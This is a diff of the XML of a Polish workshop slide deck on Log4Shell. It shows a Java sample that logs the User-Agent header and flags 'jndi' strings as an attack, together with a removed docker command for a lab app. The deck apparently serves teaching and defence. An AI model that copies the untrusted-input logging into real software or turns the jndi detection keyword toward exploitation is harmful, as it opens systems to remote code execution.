+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>ala</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>(@</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>RequestHeader</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>("User-Agent") String </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>userAgent</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>) {</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>	</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>if</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>( </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>userAgent.toLowerCase</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>().</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>contains</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>("</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>jndi</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>"))</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>	 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>logger.warn</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>("Attack </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>detected</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>");</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>	</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>else</a:t>
+            </a:r>
+            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="dk1"/>
+              </a:solidFill>
+              <a:latin typeface="Courier New"/>
+              <a:ea typeface="Courier New"/>
+              <a:cs typeface="Courier New"/>
+              <a:sym typeface="Courier New"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>logger.info</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>("User-Agent:" + </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>userAgent</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>);</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>        return "Log4Shell-app2:"+</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>Integer.toString</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>counter</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>++);</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
                 <a:solidFill>
                   <a:schemeClr val="dk1"/>
                 </a:solidFill>
@@ -14710,20 +15363,23 @@
               </a:rPr>
               <a:t>    }</a:t>
             </a:r>
-            <a:endParaRPr/>
           </a:p>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
+            <a:pPr lvl="0"/>
+            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="dk1"/>
+              </a:solidFill>
+              <a:latin typeface="Courier New"/>
+              <a:ea typeface="Courier New"/>
+              <a:cs typeface="Courier New"/>
+              <a:sym typeface="Courier New"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
             <a:r>
-              <a:rPr lang="pl-PL" sz="1600">
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
                 <a:solidFill>
                   <a:schemeClr val="dk1"/>
                 </a:solidFill>
@@ -14734,7 +15390,7 @@
               </a:rPr>
               <a:t>}</a:t>
             </a:r>
-            <a:endParaRPr/>
+            <a:endParaRPr dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -15559,7 +16215,7 @@
                 <a:cs typeface="Open Sans"/>
                 <a:sym typeface="Open Sans"/>
               </a:rPr>
-              <a:t>Ćwiczenie 2</a:t>
+              <a:t>Podpowiedź</a:t>
             </a:r>
             <a:endParaRPr sz="3800" dirty="0"/>
           </a:p>
@@ -15609,97 +16265,6 @@
               </a:buClr>
               <a:buSzPts val="1800"/>
               <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="pl-PL" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="292929"/>
-                </a:solidFill>
-                <a:latin typeface="Arial"/>
-                <a:ea typeface="Arial"/>
-                <a:cs typeface="Arial"/>
-                <a:sym typeface="Arial"/>
-              </a:rPr>
-              <a:t>docker</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="pl-PL" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="292929"/>
-                </a:solidFill>
-                <a:latin typeface="Arial"/>
-                <a:ea typeface="Arial"/>
-                <a:cs typeface="Arial"/>
-                <a:sym typeface="Arial"/>
-              </a:rPr>
-              <a:t> run –</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="pl-PL" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="292929"/>
-                </a:solidFill>
-                <a:latin typeface="Arial"/>
-                <a:ea typeface="Arial"/>
-                <a:cs typeface="Arial"/>
-                <a:sym typeface="Arial"/>
-              </a:rPr>
-              <a:t>rm</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="pl-PL" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="292929"/>
-                </a:solidFill>
-                <a:latin typeface="Arial"/>
-                <a:ea typeface="Arial"/>
-                <a:cs typeface="Arial"/>
-                <a:sym typeface="Arial"/>
-              </a:rPr>
-              <a:t> -p 8000:8000 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="pl-PL" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="292929"/>
-                </a:solidFill>
-                <a:latin typeface="Arial"/>
-                <a:ea typeface="Arial"/>
-                <a:cs typeface="Arial"/>
-                <a:sym typeface="Arial"/>
-              </a:rPr>
-              <a:t>sowisz</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="pl-PL" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="292929"/>
-                </a:solidFill>
-                <a:latin typeface="Arial"/>
-                <a:ea typeface="Arial"/>
-                <a:cs typeface="Arial"/>
-                <a:sym typeface="Arial"/>
-              </a:rPr>
-              <a:t>/log4shell-app2</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="228600" lvl="0" indent="-165100" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:srgbClr val="292929"/>
-              </a:buClr>
-              <a:buSzPts val="1800"/>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
             </a:pPr>
             <a:endParaRPr dirty="0">
               <a:solidFill>

--- a/log4shell_admindays.pptx
+++ b/log4shell_admindays.pptx
@@ -5,7 +5,7 @@
     <p:sldMasterId id="2147483648" r:id="rId1"/>
   </p:sldMasterIdLst>
   <p:notesMasterIdLst>
-    <p:notesMasterId r:id="rId32"/>
+    <p:notesMasterId r:id="rId31"/>
   </p:notesMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="256" r:id="rId2"/>
@@ -16,8 +16,8 @@
     <p:sldId id="261" r:id="rId7"/>
     <p:sldId id="262" r:id="rId8"/>
     <p:sldId id="263" r:id="rId9"/>
-    <p:sldId id="287" r:id="rId10"/>
-    <p:sldId id="272" r:id="rId11"/>
+    <p:sldId id="272" r:id="rId10"/>
+    <p:sldId id="292" r:id="rId11"/>
     <p:sldId id="267" r:id="rId12"/>
     <p:sldId id="265" r:id="rId13"/>
     <p:sldId id="264" r:id="rId14"/>
@@ -26,35 +26,34 @@
     <p:sldId id="274" r:id="rId17"/>
     <p:sldId id="273" r:id="rId18"/>
     <p:sldId id="275" r:id="rId19"/>
-    <p:sldId id="281" r:id="rId20"/>
-    <p:sldId id="270" r:id="rId21"/>
-    <p:sldId id="280" r:id="rId22"/>
-    <p:sldId id="278" r:id="rId23"/>
-    <p:sldId id="277" r:id="rId24"/>
-    <p:sldId id="289" r:id="rId25"/>
+    <p:sldId id="270" r:id="rId20"/>
+    <p:sldId id="280" r:id="rId21"/>
+    <p:sldId id="278" r:id="rId22"/>
+    <p:sldId id="289" r:id="rId23"/>
+    <p:sldId id="291" r:id="rId24"/>
+    <p:sldId id="277" r:id="rId25"/>
     <p:sldId id="282" r:id="rId26"/>
     <p:sldId id="283" r:id="rId27"/>
     <p:sldId id="290" r:id="rId28"/>
     <p:sldId id="284" r:id="rId29"/>
     <p:sldId id="286" r:id="rId30"/>
-    <p:sldId id="292" r:id="rId31"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
   <p:embeddedFontLst>
     <p:embeddedFont>
       <p:font typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-      <p:regular r:id="rId33"/>
-      <p:bold r:id="rId34"/>
-      <p:italic r:id="rId35"/>
-      <p:boldItalic r:id="rId36"/>
+      <p:regular r:id="rId32"/>
+      <p:bold r:id="rId33"/>
+      <p:italic r:id="rId34"/>
+      <p:boldItalic r:id="rId35"/>
     </p:embeddedFont>
     <p:embeddedFont>
       <p:font typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
-      <p:regular r:id="rId37"/>
-      <p:bold r:id="rId38"/>
-      <p:italic r:id="rId39"/>
-      <p:boldItalic r:id="rId40"/>
+      <p:regular r:id="rId36"/>
+      <p:bold r:id="rId37"/>
+      <p:italic r:id="rId38"/>
+      <p:boldItalic r:id="rId39"/>
     </p:embeddedFont>
   </p:embeddedFontLst>
   <p:defaultTextStyle>
@@ -858,7 +857,7 @@
   <p:cSld>
     <p:spTree>
       <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 84"/>
+        <p:cNvPr id="1" name="Shape 114"/>
         <p:cNvGrpSpPr/>
         <p:nvPr/>
       </p:nvGrpSpPr>
@@ -872,7 +871,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="85" name="Google Shape;85;p2:notes"/>
+          <p:cNvPr id="115" name="Google Shape;115;p7:notes"/>
           <p:cNvSpPr txBox="1">
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -910,7 +909,7 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="86" name="Google Shape;86;p2:notes"/>
+          <p:cNvPr id="116" name="Google Shape;116;p7:notes"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
           </p:cNvSpPr>
@@ -952,7 +951,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="992768704"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3285849115"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -1918,7 +1917,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3458086007"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3230637175"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -2131,7 +2130,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3230637175"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3679819648"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -2142,115 +2141,6 @@
 </file>
 
 <file path=ppt/notesSlides/notesSlide21.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 131"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="132" name="Google Shape;132;p9:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="685800" y="4343400"/>
-            <a:ext cx="5486400" cy="4114800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="133" name="Google Shape;133;p9:notes"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="381000" y="685800"/>
-            <a:ext cx="6096000" cy="3429000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-        </p:spPr>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3679819648"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
-<file path=ppt/notesSlides/notesSlide22.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -2359,7 +2249,225 @@
 </p:notes>
 </file>
 
+<file path=ppt/notesSlides/notesSlide22.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 114"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="115" name="Google Shape;115;p7:notes"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="116" name="Google Shape;116;p7:notes"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
